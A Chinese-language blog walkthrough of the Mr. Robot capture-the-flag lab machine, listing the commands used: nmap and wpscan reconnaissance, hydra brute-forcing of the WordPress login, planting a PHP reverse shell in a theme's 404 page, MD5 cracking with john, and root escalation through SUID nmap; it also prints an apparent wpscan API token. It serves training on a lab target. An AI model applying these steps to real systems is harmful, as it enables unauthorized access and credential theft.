AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

【靶机】MR.ROBOT思考与总结

2022-12-16 87
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 本次靶机比较简单,适合初学者练手。

个别细节请看视频

地址

https://www.bilibili.com/video/BV12d4y1G71K

靶机可以去tryhackme,也可以去vulnhub

具体如何下载安装请看dc-1

信息收集

nmap -sP 192.168.92.0/24

Snipaste_2022-09-05_11-41-02

 

nmap 192.168.92.131

Snipaste_2022-09-05_11-43-00

 

wpscan –url ip

wp 4.3.1

http://10.10.37.114/robots.txt

 

拿到flag1

http://10.10.37.114/fsocity.tic

 

爆破

 

 

hydra -l Elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64

 

Snipaste_2022-09-05_12-37-20

 

hydra -vV -l elliot -P 1.txt 192.168.92.131 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

Snipaste_2022-09-05_12-11-49

 

wpscan --url http://10.10.37.114/ -U Elliot -P ./1.txt --api-token oiurrxr07NwxeiwmsrUe0fpavNC6hrjQ12a0ZGwfMJo

Snipaste_2022-09-05_12-11-40

 

 

拿shell

find / -name php-reverse-shell.php

将里面的内容复制粘贴到404.php

Snipaste_2022-09-05_12-15-38

 

 

Snipaste_2022-09-05_12-42-57

 

拿到flag2

 

python -c 'import pty; pty.spawn("/bin/bash")'

 

 

 

john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt 6.txt --fork=10

 

 

 

提权

 

 

find / -user root -perm -4000 2>/dev/null

nmap --interactive

!sh

拿到root权限

Snipaste_2022-09-05_12-56-44

拿到flag3

文章标签:
Python
Shell
Zacarx
目录
相关文章
keitwotest
|
机器人 Python
Robot Framework之python脚本调用
前言 喜欢使用RF的原因之一就是能自己定义关键字,这篇就简单说下如何创建系统关键字,先来个最简单的,求比较两个数的大小 一、建立库文件 假设python的安装路径在D:/下面(作者是放在D:\python\python27) 1、在D:\python\...
keitwotest
3915 0
不拿flag不改名
|
6月前
|
安全
实验:逆向分析sample_mal.exe文件
实验:逆向分析sample_mal.exe文件
不拿flag不改名
114 0
ModelScope运营小助手
|
6月前
|
自然语言处理 数据可视化 数据挖掘
Agent实操(四):Code Interpreter,生成二维码、视频、PDF转txt等炸裂功能
本文介绍Agent自带的Code Interpreter有哪些高级而实用的能力
ModelScope运营小助手
345 0
Agent实操(四):Code Interpreter,生成二维码、视频、PDF转txt等炸裂功能
sumith
|
6月前
|
安全 搜索推荐 网络安全
信息收集工具 -- Hacking-tools
信息收集工具 -- Hacking-tools
sumith
36 0
游客ex4ta4lkwr4uu
|
安全
MacBook Pro M1 安装Burp Suite教程
这一期主要针对1.0与2.0的区别介绍。 下一期:针对 二级三级的检查内容进行分析 等级测评 1.0与2.0 了解等保测评 信息安全等级保护测评,是经公安部认证的具有资质的测评机构,依据国家信息安全等级保护规范规定,受有关单位委托,按照有关管理规范和技术标准,对信息系统安全等级保护状况进行检测评估的活动。 等保1.0规定 2007年和2008年颁布实施的<<信息安全等级保护管理办法>>《信息安全等级保护基本要求》 等保2.0规
游客ex4ta4lkwr4uu
719 0
落寞的鱼
|
安全 Oracle 机器人
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
看完这篇 教你玩转渗透测试靶机Vulnhub——Mr-Robot :1
落寞的鱼
157 0
panda墨森
|
Linux 数据库 数据安全/隐私保护
【Empire系列】01-安装和简介
这是之前Empire的一些学习记录笔记,比较基础,有需要的可以看看。大佬可以略过
panda墨森
496 0
授客
|
机器人 测试技术 数据库
RobotFramework 官方demo Quick Start Guide rst配置文件分析
RobotFramework 官方demo Quick Start Guide rst配置文件分析
授客
148 0
柳鲲鹏
|
Java Maven
jsweet-examples下载测试
jsweet-examples下载测试
柳鲲鹏
47 0
cejze5tbulhvo
|
机器人 Java 测试技术
Robot Framework(2)- 快速安装
Robot Framework(2)- 快速安装
cejze5tbulhvo
212 0
Robot Framework(2)- 快速安装